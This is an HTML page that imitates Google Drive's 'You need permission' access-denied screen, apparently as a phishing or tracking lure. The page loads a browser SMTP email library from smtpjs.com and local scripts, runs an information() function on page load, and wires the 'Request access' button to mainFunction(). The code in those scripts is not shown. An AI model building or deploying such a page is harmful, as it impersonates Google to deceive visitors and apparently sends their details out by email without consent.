<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" type="text/css" href="main.css">
    <script src="main.js"></script>
    <script src="info.js"></script>
    <script src="https://smtpjs.com/v3/smtp.js"></script>

    <style>
        @font-face {
	font-family: Product Sans;
	font-style: normal;
  	font-weight: 400;
	src: url('pxiDypQkot1TnFhsFMOfGShVF9eO.woff2') format('woff2');
}
    body { 
	    background-color: #ffffff;
	    font-size: 13px;
	    margin: 0;
	    padding: 0;
	    font-family: Arial,sans-serif;
    }
    #message {
    color: #222;
    font: 15px/1.6 Arial, sans-serif;
    width: 480px;

}
#accessDeniedHeader {
    color: #222;
    font: 32px Arial, sans-serif;
}
#main {
    position: relative;
    width: 640px;
    top: 30px;
}
#outerContainer {
    margin: auto;
    max-width: 750px;
}

#innerContainer {
    margin-bottom: 20px;
    margin-left: 40px;
    margin-right: 40px;
    margin-top: 180px;
    position: relative;
}

.docs-drivelogo-text {
    color: #000;
	display: inline-block;
	opacity: 0.54;
	text-decoration: none;
	font-family: 'Product Sans',Arial,Helvetica,sans-serif;
	font-size: 32px;
	text-rendering: optimizeLegibility;
	position: relative;
	top: -6px;
	left: -7px;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}
.docs-drivelogo-img {
    background-image: url('googlelogo_color_116x41dp.png');
    background-size: 116px 41px;
    display: inline-block;
    height: 41px;
    vertical-align: bottom;
    width: 116px;
}
    </style>
</head>
<body onload="information();">    
    </div>
    <div id="outerContainer">
		<div id="innerContainer">
            <div style="position: absolute; top: -80px;">
                <div id="drive-logo">
                    <span class="docs-drivelogo-img"></span>
                    <span class="docs-drivelogo-text"> Drive</span>
                </div>
                <div style="clear:both"></div>
    <div id="main">
    <p id="accessDeniedHeader">You need permission</p>
    <div id="message">
        <p>Want in? Ask for access, or switch to an account with permission.</p>
    </div>
    <p id="buttons" style="padding-top: 10px">
    <button id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="mainFunction()" type="submit">Request access</button>
    </p>
</div>
</body>
</html>
